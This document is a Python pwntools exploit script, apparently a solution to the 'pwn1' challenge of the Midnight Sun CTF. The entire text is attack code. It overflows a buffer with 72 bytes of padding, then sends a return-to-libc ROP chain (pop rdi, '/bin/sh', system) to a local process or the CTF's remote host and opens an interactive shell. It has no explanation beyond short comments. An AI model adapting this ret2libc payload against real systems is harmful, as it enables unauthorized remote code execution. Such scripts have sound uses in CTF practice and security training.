#!/usr/bin/env pythonimport sysfrom pwn import *elf = ELF('./pwn1')

1. #!/usr/bin/env python
2.  
3. import sys
4. from pwn import *
5.  
6. elf = ELF('./pwn1')
7.  
8. local = True
9. offset = "A"* 72
10. if local:
11.     p = elf.process()
12.  #   libc = ELF('/lib64/ld-linux-x86-64.so.2')
13.     libc = ELF('libc.so')
14. else:
15.     host = "pwn1-01.play.midnightsunctf.se"
16.     port = 10001
17.     p = remote(host, port)
18.     libc = ELF('libc.so')
19.  
20.  
21. #Find address for printf in libc in order to get libc base address
22.  
23. p.recvuntil('buffer: ')
24.  
25. PRINTF_LIBC = 0x7ffff7e4ea20
26. libc.address = PRINTF_LIBC - libc.symbols['printf']
27. system = libc.symbols['system'] #Find the address for system to use with /bin/sh
28.  
29. pop_rdi = 0x0000000000400783 # pop rdi ; ret, found with  Ropper
30. bin_sh = libc.search('/bin/sh').next() # find address where /bin/sh is.
31.  
32. #Create the rop chain
33. rop_chain = [
34.     pop_rdi, bin_sh,
35.     system
36. ]
37.  
38. rop_chain = ''.join([ p64(r) for r in rop_chain ])
39.  
40. payload = offset + rop_chain
41.  
42. p.send(payload)
43.  
44. p.interactive()